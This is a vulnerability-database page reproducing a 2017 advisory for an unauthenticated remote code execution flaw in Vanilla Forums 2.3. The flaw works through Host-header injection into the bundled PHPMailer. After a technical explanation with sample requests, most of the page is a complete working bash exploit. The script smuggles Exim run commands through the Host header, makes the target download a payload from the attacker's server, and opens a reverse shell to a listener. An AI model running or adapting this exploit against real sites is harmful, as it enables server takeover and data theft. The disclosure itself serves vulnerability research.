Lucene search

RootSSV:93097

HistoryMay 12, 2017 - 12:00 a.m.

Vanilla Forums <= 2.3 Unauth Remote Code Execution (CVE-2016-10033)

2017-05-1200:00:00

Root

www.seebug.org

0.971 High

EPSS

Percentile

99.8%

JSON

I. VULNERABILITY

Vanilla Forums <= 2.3 Unauth. Remote Code Execution (RCE) exploit CVE-2016-10033 [0day]

II. BACKGROUND

“Community Forums Reinvented
Create an online community that your customers will love. Vanilla’s forum
software is used by top brands to engage customers, drive loyalty and reduce
support costs.”

“Vanilla provides cloud and open source community forum software that powers
discussion forums worldwide with close to 1M downloads.
Built for flexibility and integration, Vanilla is the best, most powerful
community solution in the world.”

https://vanillaforums.com/en/software/
https://open.vanillaforums.com/

III. INTRODUCTION

Vanilla Forums software (including the latest stable version of 2.3 in
its default configuration) is affected by:

Remote Code Execution CVE-2016-10033 (0day)

which can be exploited by unauthenticated remote attackers to execute
arbitrary code and fully compromise the target application when combined
with Host Header injection vulnerability CVE-2016-10073 (described in
a separate advisory).

IV. DESCRIPTION

As described in the advisory of CVE-2016-10073:

The HOST header is used to form the sender email address as we can see
in the following snippet of code:

------[ library/core/class.email.php ]------

...

public function from($SenderEmail = '', $SenderName = '', $bOverrideSender = false) {
        if ($SenderEmail == '') {
            $SenderEmail = c('Garden.Email.SupportAddress', '');
            if (!$SenderEmail) {
                $SenderEmail = 'noreply@'.Gdn::request()-&gt;host();
            }
        }

        if ($SenderName == '') {
            $SenderName = c('Garden.Email.SupportName', c('Garden.Title', ''));
        }

        if ($this-&gt;PhpMailer-&gt;Sender == '' || $bOverrideSender) {
            $this-&gt;PhpMailer-&gt;Sender = $SenderEmail;
        }

        ob_start();
        $this-&gt;PhpMailer-&gt;setFrom($SenderEmail, $SenderName, false);
        ob_end_clean();
        return $this;
}

In default configuration of Vanilla the address is then passed
to the phpmailer library as the sender address in the line:

$this-&gt;PhpMailer-&gt;Sender = $SenderEmail;

The official stable version 2.3 available at:
https://open.vanillaforums.com/addon/vanilla-core-2.3

is bundled with PHPMailer library in version 5.1:

-----[ library/vendors/phpmailer/class.phpmailer.php ]----

&lt;?php
/*~ class.phpmailer.php
|  Software: PHPMailer - PHP email class                  
|   Version: 5.1

This version of PHPMailer is affected by the:

PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033)

vulnerability also discovered by the author of this advisory
and described in detail at:

https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html

Similarly to recently disclosed exploit of WordPress Core 4.6 RCE:
https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html

remote attackers may exploit the phpmailer vulnerability in Vanilla Forums
by passing the payload (additional parameters to /usr/sbin/sendmail) within the HOST
header.

For example, the following web request:


POST /vanilla2-3/entry/passwordrequest HTTP/1.1
Host: vanilla-forums-vhost -X
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Connection: close
Content-Length: 149

hpt=&Target=discussions&ClientHour=2017-05-10+22%3A00&Email=admin&Request+a+new+password=Request+a+new+password&DeliveryType=VIEW&DeliveryMethod=JSON

would inject -X parameter at the end of the argument list passed to
/usr/bin/sendmail :

Arg no. 0 == [/usr/sbin/sendmail]
Arg no. 1 == [-t]
Arg no. 2 == [-i]
Arg no. 3 == [-oi]
Arg no. 4 == [-f]
Arg no. 5 == [noreply@attackers_server]
Arg no. 6 == [-X]

** NOTE:**
It should be noted that this vulnerability can still be exploited even if Vanilla
software is hosted on Apache web server with several name-based vhosts enabled, and
despite not being the default vhost.

This is possible as the attacker can take advantage of HTTP/1.0
protocol and specify the exact vhost within the URL. This will allow the HOST
header to be set to arbitrary value as the Apache server will obtain the SERVER_NAME
from the provided URL.
This will ensure that the malicious request will reach the affected code despite invalid
vhost within the HOST header.

To demonstrate, the above web request could be simply modified to:

POST http://vanilla-forums-vhost/vanilla2-3/entry/passwordrequest HTTP/1.1
Host: arbitrary-string -X

to achieve the same effect on a host with multiple vhosts.


                                                #!/bin/bash
# 
#      __                     __   __  __           __                 
#     / /   ___  ____ _____ _/ /  / / / /___ ______/ /_____  __________
#    / /   / _ \/ __ `/ __ `/ /  / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/
#   / /___/  __/ /_/ / /_/ / /  / __  / /_/ / /__/ ,< /  __/ /  (__  ) 
#  /_____/\___/\__, /\__,_/_/  /_/ /_/\__,_/\___/_/|_|\___/_/  /____/  
#            /____/                                                   
# 
#
# Vanilla Forums <= 2.3   Remote Code Execution (RCE) PoC Exploit 0day
# Core version (no plugins, default config.)
#
# CVE-2016-10033 (RCE)
# CVE-2016-10073 (Header Injection)
#
# vanilla-forums-rce-exploit.sh (ver. 1.0)
#
#
# Discovered and coded by 
#
# Dawid Golunski
# https://legalhackers.com
# https://twitter.com/dawid_golunski
# 
# ExploitBox project:
# https://ExploitBox.io
#
#
# Exploit code:
# https://exploitbox.io/exploit/vanilla-forums-rce-exploit.sh
#
# Full advisory URL:
# https://exploitbox.io/vuln/Vanilla-Forums-Exploit-RCE-0day-Remote-Code-Exec-CVE-2016-10033.html
#
#
# Related advisories:
# https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html
# https://exploitbox.io/vuln/Vanilla-Forums-Exploit-Host-Header-Injection-CVE-2016-10073-0day.html
#
# White-paper 'Pwning PHP mail() function For Fun And RCE'
# https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html
#
#
# Usage:
# ./vanilla-forums-rce-exploit.sh target-forum-url reverse_shell_ip
#
# Tested on:
# Vanilla Core 2.3
# https://open.vanillaforums.com/addon/vanilla-core-2.3
#
# Disclaimer:
# For testing purposes only
#
#
# -----------------------------------------------------------------
#
# Interested in vulnerabilities/exploitation? 
#
# 
#                        .;lc'                          
#                    .,cdkkOOOko;.                      
#                 .,lxxkkkkOOOO000Ol'                   
#             .':oxxxxxkkkkOOOO0000KK0x:'               
#          .;ldxxxxxxxxkxl,.'lk0000KKKXXXKd;.           
#       ':oxxxxxxxxxxo;.       .:oOKKKXXXNNNNOl.        
#      '';ldxxxxxdc,.              ,oOXXXNNNXd;,.       
#     .ddc;,,:c;.         ,c:         .cxxc:;:ox:       
#     .dxxxxo,     .,   ,kMMM0:.  .,     .lxxxxx:       
#     .dxxxxxc     lW. oMMMMMMMK  d0     .xxxxxx:       
#     .dxxxxxc     .0k.,KWMMMWNo :X:     .xxxxxx:       
#     .dxxxxxc      .xN0xxxxxxxkXK,      .xxxxxx:       
#     .dxxxxxc    lddOMMMMWd0MMMMKddd.   .xxxxxx:       
#     .dxxxxxc      .cNMMMN.oMMMMx'      .xxxxxx:       
#     .dxxxxxc     lKo;dNMN.oMM0;:Ok.    'xxxxxx:       
#     .dxxxxxc    ;Mc   .lx.:o,    Kl    'xxxxxx:       
#     .dxxxxxdl;. .,               .. .;cdxxxxxx:       
#     .dxxxxxxxxxdc,.              'cdkkxxxxxxxx:       
#      .':oxxxxxxxxxdl;.       .;lxkkkkkxxxxdc,.        
#          .;ldxxxxxxxxxdc, .cxkkkkkkkkkxd:.            
#             .':oxxxxxxxxx.ckkkkkkkkxl,.               
#                 .,cdxxxxx.ckkkkkxc.                   
#                    .':odx.ckxl,.                      
#                        .,.'.      
#
# Subscribe at:
#
# https://ExploitBox.io
#
# https://twitter.com/Exploit_Box
#
# -----------------------------------------------------------------

intro="
DQobWzBtIBtbMjFDG1sxOzM0bSAgICAuO2xjJw0KG1swbSAbWzIxQxtbMTszNG0uLGNka2tPT09r
bzsuDQobWzBtICAgX19fX19fXxtbOEMbWzE7MzRtLiwgG1swbV9fX19fX19fG1s1Q19fX19fX19f
G1s2Q19fX19fX18NCiAgIFwgIF9fXy9fIF9fX18gG1sxOzM0bScbWzBtX19fXBtbNkMvX19fX19c
G1s2Q19fX19fX19cXyAgIF8vXw0KICAgLyAgXy8gICBcXCAgIFwvICAgLyAgIF9fLxtbNUMvLyAg
IHwgIFxfX19fXy8vG1s3Q1wNCiAgL19fX19fX19fXz4+G1s2QzwgX18vICAvICAgIC8tXCBfX19f
IC8bWzVDXCBfX19fX19fLw0KIBtbMTFDPF9fXy9cX19fPiAgICAvX19fX19fX18vICAgIC9fX19f
X19fPg0KIBtbNkMbWzE7MzRtLmRkYzssLDpjOy4bWzlDG1swbSxjOhtbOUMbWzM0bS5jeHhjOjs6
b3g6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eG8sG1s1QxtbMG0uLCAgICxrTU1NMDouICAuLBtb
NUMbWzM0bS5seHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s1QxtbMG1sVy4gb01N
TU1NTU1LICBkMBtbNUMbWzM0bS54eHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s1
QxtbMG0uMGsuLEtXTU1NV05vIDpYOhtbNUMbWzM0bS54eHh4eHg6DQobWzM3bSAbWzZDLhtbMTsz
NG1keHh4eHhjG1s2QxtbMG0ueE4weHh4eHh4eGtYSywbWzZDG1szNG0ueHh4eHh4Og0KG1szN20g
G1s2Qy4bWzE7MzRtZHh4eHh4YyAgICAbWzBtbGRkT01NTU1XZDBNTU1NS2RkZC4gICAbWzM0bS54
eHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s2QxtbMG0uY05NTU1OLm9NTU1NeCcb
WzZDG1szNG0ueHh4eHh4Og0KG1szN20gG1s2QxtbMTszNG0uZHh4eHh4YxtbNUMbWzBtbEtvO2RO
TU4ub01NMDs6T2suICAgIBtbMzRtJ3h4eHh4eDoNChtbMzdtIBtbNkMbWzE7MzRtLmR4eHh4eGMg
ICAgG1swbTtNYyAgIC5seC46bywgICAgS2wgICAgG1szNG0neHh4eHh4Og0KG1szN20gG1s2Qxtb
MTszNG0uZHh4eHh4ZGw7LiAuLBtbMTVDG1swOzM0bS4uIC47Y2R4eHh4eHg6DQobWzM3bSAbWzZD
G1sxOzM0bS5keHh4eCAbWzBtX19fX19fX18bWzEwQ19fX18gIF9fX19fIBtbMzRteHh4eHg6DQob
WzM3bSAbWzdDG1sxOzM0bS4nOm94IBtbMG1cG1s2Qy9fIF9fX19fX19fXCAgIFwvICAgIC8gG1sz
NG14eGMsLg0KG1szN20gG1sxMUMbWzE7MzRtLiAbWzBtLxtbNUMvICBcXBtbOEM+G1s3QzwgIBtb
MzRteCwNChtbMzdtIBtbMTJDLxtbMTBDLyAgIHwgICAvICAgL1wgICAgXA0KIBtbMTJDXF9fX19f
X19fXzxfX19fX19fPF9fX18+IFxfX19fPg0KIBtbMjFDG1sxOzM0bS4nOm9keC4bWzA7MzRtY2t4
bCwuDQobWzM3bSAbWzI1QxtbMTszNG0uLC4bWzA7MzRtJy4NChtbMzdtIA0K"


function prep_host_header() {
        cmd="$1"
        rce_cmd="\${run{$cmd}}";

        # replace / with ${substr{0}{1}{$spool_directory}}
        #sed 's^/^${substr{0}{1}{$spool_directory}}^g'
        rce_cmd="`echo $rce_cmd | sed 's^/^\${substr{0}{1}{\$spool_directory}}^g'`"

        # replace ' ' (space) with 
        #sed 's^ ^${substr{10}{1}{$tod_log}}$^g'
        rce_cmd="`echo $rce_cmd | sed 's^ ^\${substr{10}{1}{\$tod_log}}^g'`"
        #return "target(any -froot@localhost -be $rce_cmd null)"
        host_header="target(any -froot@localhost -be $rce_cmd null)"
        return 0
}


echo "$intro"  | base64 -d

if [ "$#" -ne 2 ]; then
	echo -e "Usage:\n$0 target-forum-url reverse_shell_ip\n"
	exit 1
fi
target="$1"
rev_host="$2"


echo -e '                   \e[44m| ExploitBox.io |\e[0m'
echo -e "
\e[94m+ --=|\e[0m \e[91m  Vanilla Forums <= 2.3 Unauth. RCE Exploit \e[0m  \e[94m|\e[0m"
#sleep 1s
echo -e "\e[94m+ --=|\e[0m                                               \e[94m|\e[0m
\e[94m+ --=|\e[0m           Discovered & Coded By               \e[94m|\e[0m
\e[94m+ --=|\e[0m               \033[94mDawid Golunski\033[0m                  \e[94m|\e[0m 
\e[94m+ --=|\e[0m         \033[94mhttps://legalhackers.com\033[0m              \e[94m|\e[0m 
\e[94m+ --=|\e[0m               \033[94m@dawid_golunski\033[0m                 \e[94m|\e[0m 
\e[94m+ --=|\e[0m                                               \e[94m|\e[0m
\e[94m+ --=|\e[0m \"With Great Power Comes Great Responsibility\" \e[94m|\e[0m 
\e[94m+ --=|\e[0m        \e[91m*\e[0m For testing purposes only \e[91m*\e[0m          \e[94m|\e[0m 

"

echo -ne "\e[91m[*]\033[0m"
read -p " Sure you want to get a shell on the target '$target' ? [y/N] " choice
echo
if [ "$choice" == "y" ]; then 
	
	echo -e "\e[92m[*]\033[0m Guess I can't argue with that... Let's get started...\n"
	#sleep 2s
	#sleep 2s

	# Host payload on :80
	RCE_exec_cmd="(sleep 5s && nohup bash -i >/dev/tcp/$rev_host/1337 0<&1 2>&1) &"
	echo "$RCE_exec_cmd" > rce.txt
	python -mSimpleHTTPServer 80 2>/dev/null >&2 &
	hpid=$!

	# POST data string
	data='hpt=&Target=discussions&Email=admin&Request+a+new+password=Request+a+new+password&DeliveryType=VIEW&DeliveryMethod=JSON'

	# Save payload on the target in /tmp/rce
	cmd="/usr/bin/curl -o/tmp/rce $rev_host/rce.txt"
	prep_host_header "$cmd"
	curl -H"Host: $host_header" -0 -s -i -d "$data" $target/entry/passwordrequest | grep -q "200 OK"
	if [ $? -ne 0 ]; then
		echo "[!] Failed conecting to the target URL. Exiting"
		exit 2
	fi
	echo -e "\e[92m[+]\033[0m Connected to the target"
	echo -e "\n\e[92m[+]\e[0m Payload sent successfully"
	sleep 2s

	# Execute payload (RCE_exec_cmd) on the target /bin/bash /tmp/rce
	cmd="/usr/bin/nohup /bin/bash /tmp/rce"
	prep_host_header "$cmd"
	#echo -e "Host Payload2: \nHost: $host_header"
	curl -H"Host: $host_header" -s -0 -i -d "$data" $target/entry/passwordrequest >/dev/null 2>&1 &
	echo -e "\n\e[92m[+]\033[0m Payload executed!"

	echo -e "\n\e[92m[*]\033[0m Waiting for the target to send us a \e[94mreverse shell\e[0m...\n"
	nc -vv -l 1337
	#killall python
	echo
else 
	echo -e "\e[92m[+]\033[0m Responsible choice ;) Exiting.\n"
	exit 0

fi
	#kill -9 $hpid

echo "Exiting..."
exit 0

0.971 High

EPSS

Percentile

99.8%

JSON